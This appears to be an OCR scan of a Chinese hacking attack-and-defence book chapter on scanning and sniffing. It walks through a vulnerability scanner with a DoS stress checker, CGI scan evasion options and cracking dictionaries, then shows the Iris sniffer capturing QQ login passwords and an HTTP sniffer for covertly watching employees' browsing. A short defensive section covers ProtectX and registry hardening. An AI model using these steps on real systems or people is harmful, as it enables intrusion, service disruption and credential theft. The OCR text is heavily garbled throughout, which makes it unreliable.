9) 设置 CGI 插件 扫 摘 。 在 “插件 设置 ”选项 下 选择 “CGI 相关 设置 ” 子 选 项 ， 即 可 
选择 扫描 时 需要 使 用 的 CGI 选项 ， 如 下 图 所 示 。 


个 3. 用 "GET / HTTP/1.0hrhnHeader:” 兰 换 “GET” 


C 4. 用 "GET / Jindexhtm ?paran=" 车 换 “GET* 选取 CGI 选项 


个 5. 用 "GET %00“ 蔷 换 “GET 
厂 6. 多 个 “7 或 "性 

厂 7. ”与 互 换 

厂 3. 用 "<Tab>" 普 换 "< 空 格 >" 











10) 设置 字典 文件 。 在 “字典 文件 设置 ”选项 中 可 选择 需要 的 破解 椰 典 文件 ， 双 击 即 
可 打开 文件 列表 。 在 设置 好 所 有 选项 之 后 ， 单 击 “ 确 定 ”按钮 ， 即 可 完成 扫描 参数 的 设置 。 


EM 


< 第 2 章 
言 息 的 扫描 与 嗅 探 


查找 范围 [I): [到 dat "| 


典 文 件 名 = 
.AdatAweak pass. dic 吃力 名 称 
AN ji 眉 mail_user.dic 2005/5/17 21:10 
ie et | 国 hnip userdié 2005/5/17 21:10 


.\dat\weak pass. dic Entuser.dic 2005/5/17 21:10 


.AdatAmail_ user. dic j 
ek ass. 国 snmp_pass,dic 2005/5/17 21:10 
.\dat\nntp_user,. dic = 
.\dat\wesk pass. die | Esocks_user.dic 2005/5/17 21:10 


\dat\mail_user. dic , 2 目 sqLuserdic 2005/5/17 21:10 








.\dat\weak pass. dic 

.\dat\telnet user. dic telnet_user.dic 2005/5/17 21:10 
LT 国 vnc_pass.dic 2005/5/17 21:10 
.\dat\weak pass. dic i 1 H . 
人 a [weak pass.dic 2005/5/17 21:10 


.\dat\weak pass. dic i Ewww_user,dic 2005/5/17 21:10 区 
Tm 
站 4 Wh 上 

















文件 名 加) : [socks_user. sis -| 
取消 | 文件 类 型 (7): [ediec | 取消 | 


厂 以 只 读 方 式 打开 (R) 





选择 破解 字典 文件 


2.2.4 用 扫 摘 希 扫 朱 系统 漏洞 


SSS (Shadow Security Scaner) 是 一 亚 系 统 漏洞 扫描 器 ， 可 对 很 大 范围 内 的 系统 漏洞 进 
行 安 人 全、 高效、 可 靠 的 安全 检测 ， 其 系统 扫描 的 速度 与 精度 足以 让 用 户 敢 和 专业 的 安全 机 
构 和 那些 专门 入 侵 他 人 计算 机 系统 的 黑客 较量 。 

利用 SSS 扫描 器 对 系统 漏洞 进行 扫描 的 具体 操作 步骤 如 下 。 

STEP01: 运行 SSS 扫描 器 STEP02: 设置 扫描 规则 








AD i 国 加 i 时 国 | Please, select rule for new session and enter comments. Step 1 of 2 
i Start scan Stop scan » i Addhost Delete host , i Options. Rules... - 





Rule name Description ^ 
Complete 5can This rule enable scanning t ol Se a cuer 加 
ilities of the 


A werific ation vla | NetB 10s 芒 WItc he ji 
Ee 
[1..65355] and wulnerabilties of the remote 

computer except for "Do5 tests” which ma 
potentially lead to lock-ups or hangs and 
password verification via NetBIOS is Switch 














单 击 工具 栏 上 的 “New session” 按 钮 。 用 户 可 以 选择 预 设 的 扫描 规则 , 也 可 单 击 “Add rule” 
按钮 添加 新 的 规则 O 
STEP03: 创建 新 的 扫描 规则 STEP04: 设置 扫描 选项 


General 
二 | General Installation of base value of scanning regulation. 
党 _ Description Preferences 


Protocol identification on found ports 
加 Don't get banners from port 


(0) Create copy of the rule 
Complete Scan 


e- Modules 
ls i 
Host Ping type 
A Perfom scan on hosts that do rot espond to pings 
稼 : UDP Scan Muli lookup IP Scan 


ps HTTP 加 Scan all ports in range 
Start port End port 
半 NetBI0S 1 








昼 ) Create default rule 


Please., enter new rule mame. 


痢 





2) SOCKS 回 Do not lookup IP addresses 


Jefault Logins 





贺 创建 新 的 扫描 规则 ， ” 立 单 击 “Ok” 按钮 。 图 匀 选 扫描 规则 。 单 击 “OK” 按 钮 。 
根据 提示 输入 信息 。 
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关 有 攻防 从 入 门 到 精通 


STEP06: 添加 扫描 的 目标 计算 机 


New session wizard s . 
New session wizard 


Please. select rule for new session and enter comments. Step 1 of 2 Please. add host or ip address for scanning. Step 2 of2 


Rule name 
: Lomplete 5can 
: and wu nerabil les 0 th a remote co a 
: except for "Dos tests” which may potential 
上 lead to lock-ups ee oooR re 
上 ee :ation via NetBIDOS 1s swite 
rule enable scanning 可 
区 65355] and vulnerabilities of the remote 
人 ete ie ] computer except for "DoS tests"” which ma 
\ | potentially lead to lock-ups or hangs and 
password verification via NetBIDS is switck 
off 区 


疡 RE ee = ， 人 - re 之 


Ee EE ES 

















单 击 “Next” 按 钮 。 单 击 “Add host” 按 钮 。 
STEP07: 添加 目标 计算 机 
Add host 







Select hosts to add 
(®) Host: 






选取 “Host” 单 选 按 钮 ， 可 添加 单一 目标 计算 机 
的 IP 地 址 或 计算 机 名 称 。 





132.168.0.10 


Name or |P: 





SS Hosts range: 
































FonP [0 .0.0.0 选取 “Hosts range” 单 选 按 钮 ， 可 添加 一 个 IP 地 
:Bs . 址 范围 。 
Pe i 选取 “Hosts from file” 单 选 按钮 ,可 通过 指定 已 
ee 存在 的 目标 计算 机 列表 文件 添加 目标 计算 机 。 
Group name 点 dd 
| Edt. | 选取 “Host groups” 单 选 按钮 ， 可 通过 添加 工作 
Deete | 组 的 方式 添加 目标 计算 机 ， 并 设置 登录 的 用 户 名 称 
Wirtual HTTP Hosts NetBios [for remote registry] 和 各 人 码 9 
Lser name | 
Password 











在 添加 好 目标 计算 机 之 后 ， 单 击 “Add” 按 钮 ， 即 
he 
STEP08: 完成 扫描 项 目的 创建 STEP09: 返回 SSS 主 界面 

交 i Shadow Security Scanner - [Security Scanner (Complete san an 


i File View Actions Tools Window Help 


New session wizard - 、 » 于 一 个 个 ef Dy 加 
站 . | E (by 加 (a) a 
Please, add host or ip address for scanning. Step 2 of2 | Nn Wm GD ad | 区 Dahon 











Host Audits TCP Ports 
192.168.0.10 


&dd host 


Edit host | 





| Deletehost | 


Ee 











单 击 “Next” 按 钮 单 击 工具 栏 上 的 “Start scan” 按 钮 ， 开 始 对 目标 
计算 机 进行 扫描 ， 并 可 在 “ Statistics ”选项 卡 中 
查看 扫描 进程 。 


so 








第 2 音 


信息 的 扫 朱 与 嗅 探 


STEP10: 切换 至 “Vulnerabilities” 和 选项 卡 _STEP11: 进行 DoS 安全 性 检测 


i Fle View Actions Tools Window Help 


~ ©) ee s | 巴 村 
New session 、 Stop scan 。 Addhost Delete host 、 


Scannef | Scanner | Vulnerabaies | Statistics 


Start scan Options... Rules... R 


Guest- User Never Logged On 192168010 
HelpAssistant - User Nevet Logg9ed On 192163.010 
SUPPORT_388945a0 . User Never Looged On 1392168010 


人 扫描 结果 给 出 了 危险 


程序 、 补 救 措施 等 内 容 。 “DoS Checker 选项 ， 


选择 检测 的 项 目 。 
STEP12: 开始 DoS 检测 


Dos Checker 1.03 


Dos Checker 
Step 1 of 2 


Server Status : Not Started 
Time : 00:00:00 

有 Request : 0 

Threads : 0 


ey ， 
Cancel 


查看 检测 结果 
STEP14: SSS 选项 设置 


i Security Scanner Options 
| 


General 
Installation of your connection speed parameters and capacity of your computer. 


区 | General 


Be Scanner 
让 Speed 


对 Scheduler Threads 
Modules 
双 Nmap 

Total threads 


Ping time out 





Data time out 


全 





设置 单 规 选 项 。 


5 





选择 左 侧 窗口 中 的 








Dos Checker 1.03 


Dos Checker 
Step 1 of 2 


HTTP Stress 
Host: Part : 


Threads : 


一 一 一 一 上 一 鲜 


Delay [secl: 


和 一 一 一 一 [三 -由 


Packets slze : 


一 一 一 一 他 [ww 羡 


设置 扫描 的 线程 数 ( Threads ) 之 后 ， 单 击 “Start 
按钮 。 


HTTP Stress 


他 


SMTP Stress 


L 


FTP Stress 


STEP13: 返回 主 界 面 





旺 


Add host Delete host 


时 县 ‘3 EE v= 
wn 


i New session 


Scanner 


Update 


Te 
my 重 . 
匿 Terminate license 


Base SDK 





Base SDK 


区 Scripts 


Scrpt Dos Checker 
Es 


Do5 Checker 


选择 “Tools”>"Options” 菜 单 命令 。 


STEP15: 切换 至 “Scanner” 选 项 卡 


i Security Scanner Options 


区 3 General 


Scanner 
Installation of parameters of the scanner work control, 
We Scanner Scanner 
加 Autostart after adding |P address 
贺 Delete empty host after completing scan 


Protection 
加 Password protection of program start enabled. 


5cheduler 
Fe Buto update 
Ch Sounds 
2 Change Password 
=, Nmap 
Loggin 
加 |] Generate log file of scanner operations. 
|D: 安 装 *S55\DebugLog.dat 
AutoSave 
[©] autoSave Session file. 
|*ses 


设置 扫描 选项 。 


= 一 > 
全- 攻防 从 入 门 到 精通 


2.2.5 ”用 Pote( 人 多 实现 扫描 的 反击 与 追踪 


ProtectX 是 一 训 在 用 户 连 接 网 络 时 保护 计算 机 的 工具 ， 可 以 同时 监视 20 个 端口 ， 还 可 
以 帮助 追踪 攻击 者 的 来 源 。 一 旦 有 人 演 斌 入侵 连接 到 用 户 的 计算 机 ， 即 可 发 出 声音 警告 并 
将 入 侵 者 的 IP 位 址 记录 下 来 ， 可 以 防止 黑客 入 侵 。 

1. ProtecX 实用 组 件 概述 

ProtectX 的 安装 过 程 与 一 般 软 件 的 安装 过 程 类 似 , 这 里 不 再 歼 述 。 在 安装 完毕 ProtectX 
后 重启 系统 , 即 可 在 Windows 操作 系统 的 通知 栏 中 看 到 显示 的 ProtectX 疾 图 标 , 双击 即 可 


EE 
取 
未 





合 人 他 他 









































显示 其 操作 界面 ， 窗 口中 间 显 示 的 是 当前 本 机 状态 信息 ， 如 右 岁 所 示 。 


电 ProtectX Professional Edition 4 





Services Local Utilities Internet Utilities Preferences Help 





:Uerbose Mode Disabled 

a ry Deactivated 
ry Hct vate 

:Trojan Sentry Deact ivated 

:Trojan Sentry Hct ivated 

:IdentD Server Deact ivyated 


Hacker Defence Suite 





ProtectX 初 始 界面 


ProtectX 提供 了 几 项 实用 功能 组 件 , 依次 是 端口 安全 (Port Sentry)、 特洛伊 安全 (Trojan 
Sentry) 和 Identd 服务 (Identd Server) 等 。 

1) 疹 口 安全 (Port Sentry)。 端 口 安 全 束 是 病 口 扫描 监视 占 ， 在 TCP 端口 1 上 监听 ， 
如 果 有 扫描 活动 触发 到 1 号 端口 ， 则 Port Sentry 将 会 报警 ， 如 下 左 图 所 示 。Protectx 即 
可 反 跟 踩 对 方 ， 得 询 其 域名 、 妃 溯 起 路 由 信息 ， 并 显示 所 截击 到 的 扫描 信息 ， 如 下 右 疼 
所 示 。 











电 ProtectX Professional Edition 4 


Services Local Utilities Internet Utilities Preferences Help 





t available ats httpss//Www,arin.Nnet/whois_tou.html 


2013 却 16 月 36 昌 84:25:31 下 午 :Whois Results For 192.1683.1.19 Completed 


acin 192,168.1.18 
P #B ,19 - 4L8QD1ETPGKUS1W 
acero' C lete 


WARNING 
Connection Attempted 


sts 192.168.1.19 。。。 
ete。。 Milliseconds: 8 
e 


而 加 加 
TTT TT 
mm MM 


和 和 人 人 二 
网 由 的 诚 店 
AH 
他 有 表 下 有 民 下 有 
六 


d 
四 Resolves to 4LSQD1ETPGKUS1UW 
omplete 


EE 


Te 
Fp 
Mm 








Sas) RrotectX 


多 慎 圣 时 Hacker Defence Suite 








Port Sentry 的 报警 信息 显示 所 截击 到 的 扫描 信息 


”有 岂 
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2) 特洛伊 安全 〈Trojan Sentry)。 是 指 在 一 些 木 马 音 用 闪 口 上 进行 监听 ， 一 旦 发 现 有 人 
试图 连接 这 些 端口 ， 即 可 报警 。 

3) Identd 服务 〈Identd Server)。 可 在 计算 机 上 打开 一 个 安全 Identd 服务 ， 初 级 用 户 最 
好 不 要 打开 这 个 服务 。 

2. 防御 扫描 器 入 侵 

有 了 ProtectX 的 保护 ， 对 于 一 般 的 扫描 攻击 ， 用 户 残 可 以 不 用 担心 了 。 不 过 仅仅 依靠 
这 个 工具 ， 还 远 远 谈 不 上 高 枕 无 忧 ， 还 需要 提前 做 好 防御 扫描 入 侵 的 准备 。 

1) 对 于 Windows 用 户 ， 要 修改 注册 表 ， 禁 止 匿名 用 户 对 IPC$ 的 访问 。 首 先 单 击 “ 开 
始 ” 按 钮 ， 在 弹出 的 “开始 ” 朋 单 中 早 击 “运行 ”命令 ， 如 下 左 图 所 示 。 这 时 会 漳 出 “ 运 
行 ” 对 话 框 。 在 其 中 输入 “regedit” 命 令 后 单 击 “ 确 定 ” 按 钮 ， 如 下 右 图 所 示 ， 即 可 打开 
注册 表 编 辑 器 。 

















Monitor Tomcat 
Microsoft Baseline Security ra Windows 将 根据 容 所 输入 的 名 称 ， 为 您 打开 相应 的 程序 、 
Analyzer 2.2 文件 去 、 文 昼 或 Internet 资源 . 


让 Shadow Security Scanner 


FreeportScanner 


打开 (Q); reg ed 


如 ProtectX Hacker Defence Suite 





单 击 “运行 ”命令 。 输入 “regedit" 命令 。 


修改 方法 是 在 注册 表 编 辑 器 中 展开 HKEY LOCAL MACHINE\SYSTEM\Current 
Control Set\Control\Lsa 分 文 ， 找 到 restrictanonymous 数值 并 将 其 值 改 为 1， 如 下 图 所 示 。 


了 注册 雪 编 


应 wy : PS 2 
文件 ( ”编辑 (E) 查看 (V) 收藏 夫 (A) 帮助 (H) 

: : 》 “和 Diagnostics 名 称 类 型 数据 
:| 0 Els ab] (默认 ) REG_SZ (数值 未 设置 ) 
?7 Errata %slauditbasedirec... REG_ DWORD 0x00000000 (0) 
i hb Filesystem 虽 auditbaseobje.。REG_DWORD 0x00000000 (0) 
ab]Authentication ... REG_MULTI SZ msv1.0 
吕 Bounds REG_BINARY 00 30 00 00 00 20 00 00 
员 crashonauditfail| REG_DWORD 0x00000000 (0) 
disabledomain... 


; FileSystemUitilities 
| : b “DD FontAssoc 

: | b “和 GraphicsDrvers 

: : 几 GroupOrderList 
:5 HAL 

: : 上 几 hivelist 、 
IDconfgpe forceguest 

中 Ps|fullprivilegeau... 


: : > -| Keyboard Layout 、 
J Be|LimitBlankPass... 


Keyboard Layouts 
|! 咒 |Lsapid 

| > -LsaExtensionConfig 器 NotmHash 

:i i LsalInformation ab| Notification Pa... 





| > "bh MediaCategories 
5- MediaDRM 

: b> “Medialnterfaces Telrestrictanonynts 

| bp Mediaproperties SecureBoot REG_DWORD 

p> -出 MediaResources ab]Security Packa... REG_MULTI_ SZ kerberos msv1 0 schannel wdigest 
: : "而 MediaSets 

| | b “hh MediaTypes 











| > "Dy MediumCache 





将 restrictanonymous 数 值 改 为 1 


5 


取 


新 


2) 修改 注册 表 ， 禁 止 目 动 管 理 共 享 。 在 注册 表 编 辑 器 中 展开 HKEY LOCAL 
MACHINENASYSTEMNCurrentControl Set\Services\Lanmanserver\parameters 分 文 ， 找 到 Auto 


合 人 人 他 





黑 名 


> 
攻防 从 入 门 到 精通 








ShareServer 数值 并 将 其 改 为 0， 同 时 找到 AutoShareWKs 数值 并 将 其 改 为 0。 

















文件 (FP) ”编辑 (E) ” 童 看 (V) 收藏 夫 (A) 帮助 (H) 

> -| KSecDD ^ || 名 称 类 型 2 二 

和 SacPhg (默认 ) REG_SZ (数值 未 设置 

-tmRm 例 AdjustedNullS..。 REG_DWORD 0x00000003 (3) 

> L1C 例 autodisconnect REG_DWORD Ox0000000f (15) 
和 Er 一 
: EE AutotunedParameters ee 本 数 扩 各 你 0 : 

bk ) DefaultSecurity OR REG DO 全 

， 划 Guid REG_B 基 效 ) 8f 

有 = | Linkage es |q 加 十 六 进 制 00 

: ms Lmannounce REG_D 十 进 制品 ) 

i BD Shareproviders S| NullSessionPip... REG- 确证] [取消] 
| -加 Shares Ps requiresecurity... REG. 

7 restrictnullsess... REG_DWORD 0x00000001 (1) 

-四 ldap ab| ServiceDI| REG_EXPAND SZ 。 %SystemRoot96\system32Nsrvsvc,d 
> -J lltdio 一 | 岗 ServiceDllUnlo..，REG_DWORD 0x00000001 (1) 

» -Bh lltdsve | 加 Size REG_DWORD Ox00000001 (了) 

;- © Imhosts | | 3b|srvcommen t REG SZ 

> > ) Lsa 

> - 喝 LSLFC 

> -有 LSLSAS 

> -有 LSLSAS2 

» -出 LSILSCSI 

-用 luafy 

D>- ) Mcx2Svc 











将 AutoShare Server 数值 改 为 0 





3) 及 时 更 痢 操 作 系统 ， 其 重要 性 融 不 必 多 说 了 。 


2.3” 嗅 探 的 实现 与 防范 


2.3.1 什么 是 昭 


中 探 右 是 一 种 监视 网 络 数据 运行 的 软件 设备 。 虽 探 豆 是 一 把 双 刃 全 ， 如 果 到 了 墨客 的 
手 里 ， 咒 探 帮 能够 捕获 计算 机 用 户 们 因为 琉 忽 而 带 来 的 源 凋 ， 成 为 一 个 危险 的 网 络 间 诬 。 
但 如 末 到 了 系统 管理 员 的 手 里 ， 则 能 帮助 用 户 监 控 寞 种 网 络 流量 ， 从 而 更 好 地 管理 好 网 络 。 
网 络 运 作 和 维护 都 可 以 采用 嘿 探 右 : 如 监视 网 络 流量 、 分 析 数 据 包 、 监 视 网 络 资源 利用 、 
执行 网 络 安全 操作 规则 、 鉴 定 分 析 网 络 数据 以 及 诊断 并 修复 网 络 问 题 等 。 非 法 噢 拧 吉 严 重 
威胁 网 络 安全 性 ， 这 和 是 因为 它 实质 上 不 能 进行 探测 行为 且 容易 随处 插入 ， 所 以 网 络 墨 客 蜗 
将 它 作 为 攻击 武 问 。 


yr 口 口 
探 颖 























2.3.2 ”经 典 串 探 器 Il 


网 络 通信 分 析 工 具 Iris 可 以 帮助 系统 省 理 员 轻易 地 捕获 和 但 看 进出 网 络 的 数据 包 ， 进 
行 分 机 和 解码 并 生成 多 种 形 陈 的 统计 图 表 ， 还 可 以 探测 本 机 交口 和 网 络 设备 的 使 用 情况 ， 
有 效 地 管理 网 络 通信 。 使 用 Fis 对 QQ 登录 密 但 进行 噢 探 的 过 程 曝 光 如 下 。 
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信息 的 扫描 与 嗅 探 


STEP01: 尼 动 Iris STEP02: 打开 Iris 主 窗 口 


-十 x 序号 时 间 Qe:sins) 来 好 MMC 地 址 | 目标 BC 地 址 幢 协议 | 来源 IP 地 址 | 目 3 


你 知道 加 ... 
| 修 林 以 设置 在 IEIS 瞄 入 时 默认 加 瞄 和 应 用 的 过 小 器 。 委 光 成 这 个 设置 ,请 转 到 工具 | 设置 | 辅 获 菜单 选项 ， 
无 过 泌 器 。 |CPV: 4% 02000 IP. 192.168.0.15 0 





选择 绑 定 网 卡 ， 然 后 单 击 “ 确 定 ” 按 钮 。 单 击 工 具 栏 上 的 “开始 捕获 ”按钮 >。 


STEP03: 开始 捕捉 所 有 流 经 的 数据 帧 


0 IRIS vA.07.1 EB) 
」 交 件 9) 查看 Y 捕获 C) 解码 由) 过 小 器 区 工具 CI) 帮助 如 i 
口 态 * 回 -|m 移 | 车 昌国 国 | 的 让 蝴 必 | 休息 -后生 全 作秀 让 国 典 .| 你 队 加 


全 全 封包 解码 器 -~ + X || 序 号 | 时 间 hi:m:s:ms) | 来 源 MAC 地 址 | 目标 MC 地 址 | 帧 | 协议 | 来源 IF 目标 IF 地 址 | 来 源 辣 
pe Frane (1514 bytes) 10 15:58:53:984 00:15:58:8... 00:73:44:6... IP U... microso 123. 162. 1. .. 9238 
人 由 - 国 上 ACE header (Ethernet II) 11 15:58:54:031 00:15:58:8... 00:73:44:B... IP T... microsof-... B1.164.15... 16757 
HD ITPv4 header 12 15:58:54:234 00:15:58:8... 00:73:44:6... IP T... microsof-... 60.191.25... 16773 
EICP header (A....) 13 15:58:54:250 00:15:58:8... 00:73:44:6... IP T... microsof-... 61.155.14... 16683 
@ Source port: 80 (TCP-> HTTP) 14 15:58:54:265 00:15:58:8... 00:73:44:6... IF T... microsof-... 61.153.48... 16682 
© Destination port: 16781 (TCP->16781) 15 15:58:54:296 00:15:58:8... 00:73:44:6... IP I... microsof-... 219.150.1... -一 
© Sequence mumber. 2154555574 16 15:58:54:296 00:15:58:8... 00:73:44:6... IP T... microsof-... 218.75.159.4 16703 
ee 17 15:58:54:296 00:73:44:6... 00:15:58:8... IP I... 219.150.1... microsof-... -一 
a p 18 15:58:54:296 00:15:58:8... 00:73:44:6... IP T... microsof-... 218.75.159.4 16801 
-图 mag: on 19 15:58:54:312 00:73:44:6... 00:15:58:8... IP T... 81.153.48... microsof-... 8080 
。 eo 20 15:58:54:312 00:73:44:6... 00:15:58:8... IP T... 60.191.25... microsof-... 80 
21 15:58:54:343 00:73:44:6... 00:15:58:8... IP T... 218.75.159.4 microsof-... 80 
22 15:58:54:343 00:15:58:8... 00:73:44:B... IP T... microsof-... 218.75.159.4 16801 














@ Checksun: Ox5C3E (Correct) 


@ Ureent pointer: 0 
@ TCP Options: None 23 15:58:54:343 00:15:58:8... 00:73:44:6... IP T... microsof-... 218.75.159.4 18801 


WH lyper Text Transfer Protocol (HTTP) 24 15:58:54:390 00:73:44:6... 00:15:58:8... IP T... 218.75.159.4 microsof-... 80 


< 


回回 ”加 作业 

0000 00 15 58 8A D4 F8 00 33 44 60 DB 69 08 00 45 00 

0010 05 DC D8 22 00 00 35 06 SA 06 3A D3 52 6F CO A8 

0020 00 09 00 50 41 8D 80 6B E8 B6 C2 81 SC 27 50 10 ... 
0030 19 20 SC 3E 00 00 8E A2 DF 9C A4 47 1F FB 38 FC. 

0040 95 BS 7E EA 97 99 78 BA CB 79 34 3A 7D EF 58 20 

0050 21 3D 3F FS 57 DB D6 F4 67 81 CE 44 70 E6 09 SE !=?.W.Y 





人 
用 地 址 德 您 可 以 更 加 简便 地 创建 过 源 器 。 路 = 
无 过 滤器 ”| CPU: 2% 112000 IF: 192.168.0.9 NAC: 00:15:58:8A:D4:F8 BD Realtek 10/100/1000 Ethernet F / 


查看 捕捉 结果 。 单 击 主 窗口 左 侧 的 “过 滤器 ”图 标 。 





@ Iris 主 和 窗口 元 侧 的 “封包 解码 器 ” 窗 格 中 以 树 形 结构 显示 每 个 数据 包 的 详细 结构 〈 找 
到 的 数据 包 会 被 分 解 为 容易 理解 的 部 分 ) 以 及 数据 包 的 每 个 部 分 所 包含 的 数据 。 

@ Iris 主 窗口 右上 有 角 的 “数据 包 列 表 ” 窗 格 中 显示 所 有 流 经 的 数据 包 《〈 新 产生 的 数据 
包 目 动 添加 到 列表 里 )。 在 选中 特定 的 数据 包 之 后 ， 其 详细 信息 将 会 呈 树 形 显示 在 
“封包 解码 右 ” 窗 格 中 。 每 一 行 数据 包 信息 所 包含 的 属性 有 数据 包 流 经 时 间 、 源 和 
目的 MAC 地 址 、 顿 形式 、 所 用 传输 协议 、 源 和 目的 卫 地 址 、 所 用 端口 、 确 认 标志 
及 大 小 等 。 

@ Iris 主 窗口 右 下 角 的 “编辑 数据 包 ” 窗 格 分 左 、 右 两 部 分 ， 无 边 显 示 数 据 包 十 六 进 
制 信息 ， 右 边 则 显示 对 应 的 ASCII 值 ; 可 以 在 这 里 编辑 、 修 改 数据 包 并 发 出 去 《会 
目 动 添加 到 数据 包 列 表 中 )。 


;55 
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信人 人 
STEP04: 编辑 过 滤器 设置 





编辑 过 雍 圳 训 置 


人 





i = 对 要 过 滤 的 各 个 选项 进行 设置 。 
< 插 太 | 


移 除 -> 
全 部 移 除 ->| 
HETBIOS-DGN 138 


仿 包括 个 排除 
注意 : 已 过 滤 的 端口 将 会 应 用 于 封包 来 源 端口 或 目标 端口 


职 消 ”| 应 用 性 玫 助 | 


@ 在 没有 开启 Filter 功能 之 前 ， 可 能 抓获 的 是 所 有 进出 网 卡 的 流量 ， 为 了 方 
VV 便 查找 目标 ， 需 要 进行 简单 的 过 滤 ， 包 括 硬件 、 层 、 关 键 字 、 端 口 、MAC 地 
提示 。 址 、IP 地 址 等 的 过 滤 。 


STEP05: 运行 QQ 的 客户 端 软件 


[© nna vd4.07-1 国 回 加 
| 文件 四 查看 中 _ 捕 获 C) 解码 四 过 涉 器 区) 工具 I) 必 助 外 国 
Ds:B-[elb ed .eNO ON 国友 -| 人 Q 愉 加 


Iris | | 部! 码 [om 
自身 医 3; 活动 局- - | 日 期 /时 间 出 :0:Y7h:m: s:ms) | 客户 端 | 服务 器 | 客户 端 端口 | 服务 器 端口 | 客户 端 IC | 进入 宇 节 A 
捕获 瑟 加 microsof-cOc50d. kinenet (192.168.0. 9) . .6:24:2010/16:10:42:531 Mic... 于 00:15:5.;. 841 
E | 各 Tcr-> HTTP (80) ,6:24:2010/16:10:42:734 es 00:15:5... 
(DY ICP-»Generic (8080) .. B:24:2010/16:10:42:765 nic... 61.... 00:15:5... 
mW TCP->1103 (1103) .6:24:2010/16:10:42:531 mic... 6l.... 00:15:5... 
io TCP->3002 (9002) .. 6:24:2010716:10:42:734 人 | 00:15:5... 
ia TCP->Generic (8000) .. 6:24:2010/16:10:42:765 eo, Sin | 00:15:5... 
io TCP->10116 (10116) .. 6:24:2010/16:10:42:765 Pe | 00:15:5... 
ion TCP->12418 (12418) .. 6:24:2010/18:10:42:531 ge Belo | 00:15:5... 
es . .6:24:2010716:10:42:546 er las | 00:15:5... 
Fon TCP->11508 (11508) .. 6:24:2010/16:10:42:718 1 i | 00:15:5... 
fo TCP- X0000 (9000) .. 6:24:2010/16:10:42:546 es | 00:15:5... 


Wo TCP->11245 (11245) .. 6:24:2010/16:10:42:718 Css di | QO 


mn TCP->11005 (11005) .. 6:24:2010/16:10:42:546 i Wi 00:15:5.0 

Wm TCP->8382 (8382) .. 6:24:2010/16:10:42:546 Re 和 | 00:15:5: 

TCP->8116 (8116) | 

ICP->9043 (9043) -一 

TCP->24472 (24472) 

TCP->12205 (12205) 他 本 售 全 9 @ 

ITC?-29527 (9527) GET /spymnet312. exe HTIP/1.1 

fa TCP->10767 (10767) Bccept: w/w 

TICP->9001 (9001) Cache-Control: no-cache 

TCP->11787 (11787) Cormection: Keep-Alive 

TCF->8768 (8768) Host: 23, duote, org:8080 

ICP->13050 (13050) Prasma: nn-rarhe 

MM Trp->innas fiNN2a5) < | 

您 知道 喇 、 国 

利用 地 址 每 您 可 以 更 加 简便 地 创建 过 滤器 。 东 v 
| 匹 过 沥 器 。 |CPV: 3 F2000 [IP: 192.168.0.9 MAC: 00:15:58:8A:D4:F8 | Resltek 10/100/1000 Ethernet ,/ 























QO 登录 成 功 后 单 击 Iris 工 具 密码 就 藏 在 捕获 的 数据 包 中 ， 单 击 左 侧 的 
栏 上 的 “停止 抓 包 ”按钮 目 , 停 ” ” “解码 ”按钮 ， 即 可 对 捕获 的 数据 包 进行 分 析 
止 对 数据 的 捕获 。 查找 。 


@ 在 左边 的 “主机 活动 ” 窗 格 中 ， 选 择 按照 服务 类 型 显示 的 树 形 结构 的 主机 
传输 信息 。 


提示 @ 在 选中 茶 个 服务 之 后 ， 客 户 机 和 和 服务 器 之 间 的 会 话 信 息 就 会 显示 在 “会 


话 列表 视图 ” 窗 格 中 。 
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@ 在 选中 某 个 会 话 记录 之 后 ， 就 可 以 在 “会 话 数据 视图 ” 窗 格 里 显示 解码 
后 的 信息 。 
在 “会 话 列表 视图 ” 窗 格 中 ， 每 个 会 话 的 属性 有 服务 器 、 客 尸 机 、 服 务 器 


端口 、 客 尸 机 端口 、 和 客户 机 物理 地 址 ， 还 有 服务 器 到 客户 机 的 数据 量 、 客 户 机 
到 服务 器 的 数据 量 以 及 总 的 数据 量 。 石 下 角 的 “会 话 数据 视图 ” 窗 格 显示 解码 
后 的 会 话 信 息 。 





STEP06: 打开 主 界 面 STEP07: 查看 主机 排名 


(3 IRIS vd. O07.1 
文件 下 ) 查看 (Y) 捕获 (C) 解码 血 ) 过 滤器 (I) 工具 (TI) 轩 


主机 活动 


-| mH) picrosof—-cO0cS0d. kinene 
{a TCF-> HITP (80) 
(2 TCP->Generic (8080) 
WH TCP->1103 (1103) 

mm TCP->9002 (9002) 


Wm TCP- Generic (8000) 
ii TCP->10116 (10116) 
Wm TCP->12418 (12418) 
WW TCP->10879 (10879) 





92. 168.0.9 8784147 字 节 来 目 17597502 49. 92% 


单 击 工具 栏 上 的 “显示 主机 排名 统计 ”按钮 闻 。 以 图 表 形 式 查 看 与 本 机 相连 的 数据 量 最 大 的 10 台 主 
机 。 


尽管 Iris 噢 探 器 功能 强大 ， 但 它 也 有 一 个 致命 的 弱点 : 墨客 必须 侵入 一 合 主机 才 可 以 
使 用 该 咒 探 工具 。 因 为 只 有 在 网 段 内 部 才 有 广播 数据 ， 而 网 络 之 间 是 不 会 有 广播 数据 的 ， 
所 以 Iris 嗅 探 弄 的 局 限 性 瓯 在 于 上 只 能 使 用 在 目标 网 段 上 。 

















2.3.3 捕获 网 页 内 容 的 文 菲 网 页 侦探 


艾 菲 网 页 侦探 是 一 个 HTTP 协议 的 网 络 串 探 器 ， 协 议 捕捉 器 和 HTTP 文件 重建 工具 。 
它 可 以 捕捉 局 域 网 内 的 含有 HTTP 协议 的 IP 数据 包 并 对 其 进行 分 析 , 找 出 符合 过 滤器 的 
那些 HTTP 通信 内 容 ; 可 以 看 到 网 络 中 其 他 人 都 在 浏览 哪些 HTTP 的 IP 数据 包 ， 并 对 其 
进行 分 析 ， 找 出 符合 过 滤器 的 那些 HTTP 通信 内 容 ; 可 以 看 到 网 络 中 的 其 他 人 都 在 浏览 
哪些 网 页 ， 这 些 网 页 的 内 容 是 什么 。 艾 菲 网 页 侦探 特别 适合 用 于 企业 主管 对 公司 员工 的 
上 网 情况 进行 监控 。 

使 用 艾 菲 网 页 侦探 对 网 页 内 容 进 行 捕获 的 过 程 曝光 如 下 。 








;7 


Ed 
2 PEF 一 
杀 攻防 从 入 门 到 精通 


售 人 他 他 





STEP01: 运行 艾 菲 网 页 侦探 STEP02: 设置 相关 属性 


证》HttpDetect (EffeTech HTTP Sniffer) - Unregistered Version Sniffer Filter 


General 


File View Sniffer Help 入 Specify buffer size to store captured packets [ >5MB h 0 习 MB 


[be | 





<50MB ] 


30 is default HTTP por Specify additional ports [separated TT 
er(IP:PORD) by spacel. e.g.: 8080 8000 


